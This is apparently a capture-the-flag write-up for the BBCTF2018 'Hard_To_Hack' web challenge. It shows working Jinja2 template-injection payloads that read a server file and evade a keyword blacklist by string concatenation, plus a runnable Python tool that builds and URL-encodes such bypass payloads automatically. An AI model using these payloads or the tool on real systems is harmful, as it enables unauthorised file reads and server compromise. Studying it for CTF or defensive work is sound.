@aadityapurani aadityapurani/
Last active Apr 8, 2018


Hard_To_Hack (Web 400) - BBCTF2018

Test conditions: {{'7'*7}} rendered as 7777777, confirming Jinja2 template injection; {{config}} dumped the application config; {{request}} was not blocked.

After several tries, I figured out that the keyword class was blacklisted, along with many other important keywords. But we can use + to concatenate two strings and build the blocked keyword at render time, so the literal keyword never appears in the request.

The general file-reading payload for Jinja2 is {{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }} (the indices are Python 2 specific: there str.__mro__ is (str, basestring, object), so [2] is object, and object.__subclasses__()[40] is the builtin file type; on another interpreter, dump __subclasses__() and pick the index of a usable class).

But several of the keywords it uses were blocked. So split them and profit:

{{''['__cla'+'ss__']['__mr'+'o__'][2]['__subcla'+'sses__']()[40]('fl'+'ag', 'r').read()}}

This behaves the same as the payload above because Jinja2 resolves subscript access with a string key, obj['name'], via getattr when the item lookup fails, so ''['__cla'+'ss__'] is ''.__class__; the concatenation is evaluated before the lookup, and the filter only ever sees the split pieces.

Hence, you send it URL-encoded. In particular the + must go as %2B: a raw + in a query string or form body is decoded as a space.
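The whole procedure above (detect the blacklisted keywords, split them with +, rewrite attribute access as subscript access, URL-encode the result) as an added, runnable example. This is not the challenge's or the author's code; the blacklist is constructed, since the write-up only confirms that class and other important keywords were filtered, and the split points differ from the write-up's payload because the splitter cuts after the first character of each match. The Jinja2 render check is optional and returns None when the library is not installed.

```python
"""Keyword-blacklist bypass helpers for the Jinja2 SSTI described above.

Added example, not the challenge's or the author's code. BLACKLIST is an
assumption constructed for this example.
"""
from urllib.parse import quote, unquote_plus

# Assumed blacklist (constructed): the write-up confirms "class" was blocked
# and that other important keywords were too, but not the exact list.
BLACKLIST = ("class", "mro", "subclasses", "flag")

# Canonical payload from the write-up. The indices are Python 2 specific:
# str.__mro__ is (str, basestring, object) there, so [2] is object, and
# object.__subclasses__()[40] is the builtin file type.
CANONICAL = "{{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }}"


def is_blocked(payload, blacklist=BLACKLIST):
    """Naive substring filter, the kind of check the challenge appears to use."""
    return any(word in payload for word in blacklist)


def split_token(token, blacklist=BLACKLIST):
    """Return a Jinja2 string-concatenation expression that evaluates to
    `token` while no single piece contains a blacklisted substring.

    '__class__' -> "'__c'+'lass__'", 'flag' -> "'f'+'lag'", 'read' -> "'read'"
    """
    pieces = [token]
    changed = True
    while changed:
        changed = False
        for i, piece in enumerate(pieces):
            for word in blacklist:
                pos = piece.find(word)
                if pos < 0:
                    continue
                if len(word) < 2:
                    raise ValueError("cannot split a single-character keyword")
                # Cut inside the match: first character stays left, rest goes right.
                pieces[i:i + 1] = [piece[:pos + 1], piece[pos + 1:]]
                changed = True
                break
            if changed:
                break
    return "+".join("'%s'" % p for p in pieces)


def build_payload(path, subclass_index=40, blacklist=BLACKLIST):
    """Rebuild the canonical file-read payload with every blocked name split.

    Attribute access that would trip the filter is rewritten as subscript
    access: Jinja2 falls back to getattr for obj['name'] when item lookup
    fails, so ''['__c'+'lass__'] is ''.__class__.
    """
    def attr(name):
        if is_blocked(name, blacklist):
            return "[" + split_token(name, blacklist) + "]"
        return "." + name

    payload = ("{{''" + attr("__class__") + attr("__mro__") + "[2]"
               + attr("__subclasses__") + "()[%d](" % subclass_index
               + split_token(path, blacklist) + ", 'r')" + attr("read") + "()}}")
    if is_blocked(payload, blacklist):
        raise RuntimeError("payload still contains a blacklisted keyword")
    return payload


def encode_for_query(payload):
    """Percent-encode the payload for a query string. The concatenation
    operator must travel as %2B: a raw '+' is decoded as a space."""
    return quote(payload, safe="")


def decode_query_value(value):
    """What the server side sees after form/query decoding ('+' -> space)."""
    return unquote_plus(value)


def render(template_source):
    """Render with real Jinja2 when it is installed; returns None otherwise."""
    try:
        from jinja2 import Environment
    except ImportError:
        return None
    return Environment().from_string(template_source).render()


if __name__ == "__main__":
    print("canonical blocked:", is_blocked(CANONICAL))
    bypass = build_payload("flag")
    print("bypass:", bypass, "blocked:", is_blocked(bypass))
    print("encoded:", encode_for_query(bypass))
    print("unencoded '+' after decoding:", decode_query_value("'fl'+'ag'"))
```

The splitter is general: any identifier or string literal that contains a blocked word is cut until no piece matches, so the same code handles a longer blacklist than the one assumed here, as long as no blocked word is a single character.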

